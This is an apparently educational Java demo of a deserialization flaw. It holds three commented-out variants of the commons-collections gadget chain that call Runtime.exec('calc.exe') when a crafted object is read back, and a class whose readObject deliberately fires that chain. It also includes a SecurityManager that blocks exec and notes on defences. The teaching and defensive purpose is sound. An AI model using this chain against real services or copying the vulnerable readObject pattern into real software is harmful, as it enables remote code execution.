反序列化漏洞
package com.lcw.demo;
import java.io.*;
import java.util.HashMap;
import java.util.Map;
// 用到的commons.collections包
import com.alibaba.fastjson.JSON;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.TransformedMap;
/**
 * Deserialization-vulnerability walkthrough. Every payload-building step below is commented
 * out, so running this class does nothing; the commented code only documents how the classic
 * commons-collections gadget chain is assembled, so that the defence can be understood.
 *
 * <p>Shape of the problem as shown here: a {@code ChainedTransformer} of
 * {@code InvokerTransformer}s is attached to a {@code Map} through {@code TransformedMap};
 * {@code SerObjRewrite#readObject} calls {@code Map.Entry#setValue} on that map while the
 * stream is being read, which runs the chain. Any code that hands untrusted bytes to
 * {@code ObjectInputStream#readObject()} with such classes on the classpath is exposed.
 *
 * <p>Defensive takeaways: do not use Java native serialization for untrusted input; where it
 * cannot be avoided, restrict the permitted classes with an {@code ObjectInputFilter} (JDK 9+),
 * never call into freshly deserialized state from {@code readObject}, and keep library versions
 * whose transformer classes are serializable off the classpath.
 */
public class DeSerPoc {
    /**
     * Entry point. Currently a no-op: all three demo variants are commented out.
     *
     * @param args ignored
     * @throws Exception declared for the commented-out I/O and reflection calls
     */
    public static void main(String args[]) throws Exception {
        // --- Variant 0: harmless round-trip of a plain SerObj through object.ser ---
        // Instantiate the object
        // SerObj serObj = new SerObj();
        // serObj.name = "serobj";
        //
        // // Serialization starts here
        // // Open the object.ser file
        // FileOutputStream fos = new FileOutputStream("object.ser");
        // ObjectOutputStream oos = new ObjectOutputStream(fos);
        // // Write serObj to object.ser with writeObject()
        // oos.writeObject(serObj);
        // oos.close();
        // fos.close();
        // Thread.sleep(2000);
        // FileInputStream fis = new FileInputStream("object.ser");
        // ObjectInputStream ois = new ObjectInputStream(fis);
        // // Read the object back from object.ser
        // SerObj deSerObj = (SerObj) ois.readObject();
        // System.out.println(deSerObj.name);
        // ois.close();
        // fis.close();

        // --- Variant 1: commons-collections 4.x API (TransformedMap.transformedMap);
        //     the original label "4.4" presumably names the library version ---
        {
            // Transformer[] transformers = new Transformer[]{
            // new ConstantTransformer(Runtime.class),
            // new InvokerTransformer("getMethod", new Class[]{
            // String.class, Class[].class}, new Object[]{
            // "getRuntime", new Class[0]}),
            //
            // new InvokerTransformer("invoke", new Class[]{
            // Object.class, Object[].class}, new Object[]{
            // null, new Object[0]}),
            // new InvokerTransformer("exec", new Class[]{
            // String.class}, new Object[]{"calc.exe"})
            // };
            //
            // Transformer transformedChain = new ChainedTransformer(transformers);
            // Map<String, String> beforeTransformerMap = new HashMap<String, String>();
            // beforeTransformerMap.put("value", "value");
            // Map afterTransformerMap = TransformedMap.transformedMap(beforeTransformerMap, null, transformedChain);
            // // SerObjRewrite.readObject calls setValue, which fires the transformer chain wrapped in afterTransformerMap
            // SerObjRewrite serObj = new SerObjRewrite();
            // serObj.map = afterTransformerMap;
            // // Write the object out (the file is actually named "bin2", not object.ser)
            // File f = new File("bin2");
            //
            // FileOutputStream fos = new FileOutputStream(f);
            // ObjectOutputStream oos = new ObjectOutputStream(fos);
            // oos.writeObject(serObj);
            // oos.close();
            //
            // /*****/
            // FileInputStream in;
            // in = new FileInputStream("bin2");
            // ObjectInputStream ins = new ObjectInputStream(in);
            // ins.readObject();
        }

        // --- Variant 2: commons-collections 3.x API (TransformedMap.decorate);
        //     the original label "3.1" presumably names the library version ---
        {
            // Transformer[] transformers = new Transformer[]{
            // new ConstantTransformer(Runtime.class),
            // new InvokerTransformer("getMethod", new Class[]{
            // String.class, Class[].class}, new Object[]{
            // "getRuntime", new Class[0]}),
            //
            // new InvokerTransformer("invoke", new Class[]{
            // Object.class, Object[].class}, new Object[]{
            // null, new Object[0]}),
            // new InvokerTransformer("exec", new Class[]{
            // String.class}, new Object[]{"calc.exe"})
            // };
            //
            // Transformer transformedChain = new ChainedTransformer(transformers);
            // Map<String, String> beforeTransformerMap = new HashMap<String, String>();
            // beforeTransformerMap.put("value", "value");
            // Map afterTransformerMap = TransformedMap.decorate(beforeTransformerMap, null, transformedChain);
            // // SerObjRewrite.readObject calls setValue, which fires the transformer chain wrapped in afterTransformerMap
            // SerObjRewrite serObj = new SerObjRewrite();
            // serObj.map = afterTransformerMap;
            // // Write the object out (the file is actually named "bin2", not object.ser)
            // File f = new File("bin2");
            //
            // FileOutputStream fos = new FileOutputStream(f);
            // ObjectOutputStream oos = new ObjectOutputStream(fos);
            // oos.writeObject(serObj);
            // oos.close();
            //
            // /*****/
            // FileInputStream in;
            // in = new FileInputStream("bin2");
            // ObjectInputStream ins = new ObjectInputStream(in);
            // ins.readObject();
        }

        // --- Variant 3: same object, but routed through fastjson (JSON.toJSONString / JSON.parseObject)
        //     instead of Java native serialization. Whether parseObject re-instantiates SerObjRewrite
        //     here depends on fastjson's autoType configuration, which this page does not show. ---
        {
            // Transformer[] transformers = new Transformer[]{
            // new ConstantTransformer(Runtime.class),
            // new InvokerTransformer("getMethod", new Class[]{
            // String.class, Class[].class}, new Object[]{
            // "getRuntime", new Class[0]}),
            //
            // new InvokerTransformer("invoke", new Class[]{
            // Object.class, Object[].class}, new Object[]{
            // null, new Object[0]}),
            // new InvokerTransformer("exec", new Class[]{
            // String.class}, new Object[]{"calc.exe"})
            // };
            //
            // Transformer transformedChain = new ChainedTransformer(transformers);
            // Map<String, String> beforeTransformerMap = new HashMap<String, String>();
            // beforeTransformerMap.put("value", "value");
            // Map afterTransformerMap = TransformedMap.decorate(beforeTransformerMap, null, transformedChain);
            // // SerObjRewrite.readObject calls setValue, which fires the transformer chain wrapped in afterTransformerMap
            // SerObjRewrite serObj = new SerObjRewrite();
            // serObj.map = afterTransformerMap;
            // String s= JSON.toJSONString(serObj);
            // Object o = JSON.parseObject(s);
            // String a = s;
        }
    }
}
/** Minimal Serializable bean used only by the first (harmless) commented-out round-trip demo. */
class SerObj implements Serializable {
    // Public on purpose to keep the demo short; production code would keep this private.
    public String name;
}
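/**
 * Second Serializable type (not an override of {@link SerObj}, despite the name) whose
 * custom {@code readObject} touches the deserialized {@link #map}.
 *
 * <p>This is the "victim" side of the demo: the JVM invokes {@code readObject} automatically
 * while reading the stream, and {@code readObject} calls {@code setValue} on an entry of a
 * Map that came straight from the stream. If that Map is a decorator whose {@code setValue}
 * runs a transformer chain, deserialization alone is enough to execute it. Calling into
 * untrusted state from {@code readObject} is the anti-pattern to avoid.
 */
class SerObjRewrite implements Serializable {
    // Optional; carried along only so the object has some ordinary state.
    public String name;
    // Raw Map on purpose: the stream may supply any Map implementation, which is exactly
    // what makes the setValue call below dangerous.
    public Map map;

    /**
     * Custom deserialization hook, invoked automatically by {@code ObjectInputStream#readObject()}.
     *
     * <p>Restores the fields, then calls {@code setValue("400m")} on the first entry of
     * {@link #map}. The original unconditionally called {@code iterator().next()}, so an empty
     * map aborted deserialization with {@code NoSuchElementException}; an empty map is now
     * treated like a {@code null} one and left untouched.
     *
     * @param in the stream being deserialized
     * @throws ClassNotFoundException if a class named in the stream cannot be resolved
     * @throws IOException on stream errors
     */
    @SuppressWarnings({"unchecked", "rawtypes"})
    private void readObject(java.io.ObjectInputStream in) throws ClassNotFoundException, IOException {
        in.defaultReadObject();
        // Nothing to touch when no map was serialized or it holds no entries.
        if (map == null || map.isEmpty()) {
            return;
        }
        Map.Entry e = (Map.Entry) map.entrySet().iterator().next();
        e.setValue("400m");
    }
}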
测试类
package com.lcw.demo;
import java.security.Permission;
/**
 * Installs a process-wide {@link SecurityManager} that blocks the two things the
 * deserialization PoC needs: spawning a process and replacing the manager itself.
 *
 * <p>Scope of this defence: {@code Runtime.exec} consults {@code SecurityManager.checkExec},
 * whose default implementation delegates to {@code checkPermission} with a {@code FilePermission}
 * carrying the {@code execute} action, so that is the permission denied here. Anything a gadget
 * chain might do other than launching a process is not covered. Note also that
 * {@code SecurityManager} is deprecated for removal since Java 17 and, from JDK 18 on,
 * {@code System.setSecurityManager} throws unless the JVM was started with
 * {@code -Djava.security.manager=allow}; the durable fix is an {@code ObjectInputFilter} on the
 * deserializing stream rather than a manager.
 */
public class TestSerialize {
    /**
     * Entry point; installs the manager and returns.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        new TestSerialize().test();
    }

    /**
     * Installs {@link ExecDenyingSecurityManager} unless a manager is already present, in which
     * case the existing one is left untouched.
     */
    private void test() {
        if (System.getSecurityManager() != null) {
            return;
        }
        System.setSecurityManager(new ExecDenyingSecurityManager());
    }

    /**
     * Denies every {@code FilePermission} whose actions include {@code execute} and every
     * {@code RuntimePermission} whose name contains {@code setSecurityManager}; all other
     * permission checks are allowed through.
     */
    private static final class ExecDenyingSecurityManager extends SecurityManager {
        @Override
        public void checkPermission(Permission perm) {
            deny(perm);
        }

        @Override
        public void checkPermission(Permission perm, Object context) {
            deny(perm);
        }

        /** Shared policy for both checkPermission overloads; throws on a denied permission. */
        private static void deny(Permission perm) {
            if (perm instanceof java.io.FilePermission) {
                String actions = perm.getActions();
                if (actions != null && actions.contains("execute")) {
                    throw new SecurityException("execute denied!");
                }
            }
            if (perm instanceof RuntimePermission) {
                String permName = perm.getName();
                if (permName != null && permName.contains("setSecurityManager")) {
                    throw new SecurityException("System.setSecurityManager denied!");
                }
            }
        }
    }
}
正式测试
package com.lcw.demo;
/**
 * Runs the demo end to end: installs the restrictive SecurityManager first, then runs the PoC.
 * The order is deliberate — the manager must be in place before any deserialization happens,
 * otherwise a live gadget chain would run unchecked.
 */
public class Test {
    /**
     * @param args ignored; {@code null} is forwarded to both delegates, neither of which reads it
     * @throws Exception propagated from {@link DeSerPoc#main}
     */
    public static void main(String[] args) throws Exception {
        TestSerialize.main(null);
        DeSerPoc.main(null);
    }
}